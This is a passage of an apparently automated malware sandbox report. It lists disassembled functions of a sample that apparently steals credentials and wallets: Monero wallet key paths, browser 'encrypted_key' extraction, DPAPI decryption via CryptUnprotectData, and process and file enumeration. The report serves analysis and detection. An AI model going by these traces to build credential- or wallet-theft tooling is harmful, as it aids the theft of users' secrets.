                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 6cd9c885b3bef6623de324e75ea9d1dd23e5cb8be553c9e7216491e49727ddb6
                                      • Instruction ID: fa953001ec0828ae73674e904c9f6151165c72dea3986189e2a1ca409f312c90
                                      • Opcode Fuzzy Hash: 6cd9c885b3bef6623de324e75ea9d1dd23e5cb8be553c9e7216491e49727ddb6
                                      • Instruction Fuzzy Hash: E6511D75A50208AFDB24DFA8CD96BED7775EF44344F008118E94A5B291DBB0AA05CB71
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00D51678,00D50D93), ref: 00D3F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00D3F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 03944c5f2eed8723c2bb1ffb69608740ee7d5922946e58fe378f5ca9cb8f827b
                                      • Instruction ID: 9fe6783b7628f380a9ed84990139616e9d32834b53ca4b0564e0607912bc5465
                                      • Opcode Fuzzy Hash: 03944c5f2eed8723c2bb1ffb69608740ee7d5922946e58fe378f5ca9cb8f827b
                                      • Instruction Fuzzy Hash: FD51F876D401089BDB04FFA8DDA2DEE7379EF54340F408569F91667191EE346A08CB72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: fe08e5ed42ff1b4013008160f79e299128a6aa6d52624c4593eb32e54df24672
                                      • Instruction ID: b61850637ef412c6ab703a06a45d690f9afc53da8840f486747365eec018f58c
                                      • Opcode Fuzzy Hash: fe08e5ed42ff1b4013008160f79e299128a6aa6d52624c4593eb32e54df24672
                                      • Instruction Fuzzy Hash: 01411C71D102099FDF04EFA8D855AEEB778EF58304F048418F91676290EB74AA08CFB2
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D3A489
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                        • Part of subcall function 00D3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                        • Part of subcall function 00D3A210: LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                        • Part of subcall function 00D3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3A2D4
                                        • Part of subcall function 00D3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D3A2F3
                                        • Part of subcall function 00D3A2B0: LocalFree.KERNEL32(?), ref: 00D3A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: df641449687349de258959993088d5af8792b29dcf596917ee66acb6c4d37972
                                      • Instruction ID: 5663922f891eef2f86ba33640a0f94dcd9c2059a75b06e11e3fe22935a775def
                                      • Opcode Fuzzy Hash: df641449687349de258959993088d5af8792b29dcf596917ee66acb6c4d37972
                                      • Instruction Fuzzy Hash: 2D3130B6E00209ABDF14DBE8DC45AEEB7B8EB58300F044518E941A7281E7359A04CB72
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505BF), ref: 00D4885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00D4886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00D48883
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • CloseHandle.KERNEL32(?), ref: 00D488F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: b4ac2d61025fd7b5b2bd54ea8ff332c1df42f707acf9bf72bec6a613ff118ad6
                                      • Instruction ID: 111e25152f21560d4dee23410535d4ac713a69a1fc51cfa37ba3a25ffd2eedbb
                                      • Opcode Fuzzy Hash: b4ac2d61025fd7b5b2bd54ea8ff332c1df42f707acf9bf72bec6a613ff118ad6
                                      • Instruction Fuzzy Hash: DC317A71941618ABDB25EF98DC92FEEB778FF44740F104199F50AA2190DB346A48CFB1
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DAFE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DAFE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50DE8,00000000,?), ref: 00D47B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00D50DE8,00000000,?), ref: 00D47B54
                                      • wsprintfA.USER32 ref: 00D47B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      APIs
                                      • CreateFileA.KERNEL32(00D43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43D3E,?), ref: 00D4948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00D43D3E), ref: 00D494A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00D494B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      APIs
                                      • __getptd.LIBCMT ref: 00D4CA7E
                                        • Part of subcall function 00D4C2A0: __amsg_exit.LIBCMT ref: 00D4C2B0
                                      • __getptd.LIBCMT ref: 00D4CA95
                                      • __amsg_exit.LIBCMT ref: 00D4CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D451CA
                                      • lstrcat.KERNEL32(?,00D51058), ref: 00D451E7
                                      • lstrcat.KERNEL32(?,01678F08), ref: 00D451FB
                                      • lstrcat.KERNEL32(?,00D5105C), ref: 00D4520D
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44B7C
                                        • Part of subcall function 00D44B60: FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                        • Part of subcall function 00D44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                        • Part of subcall function 00D44B60: FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0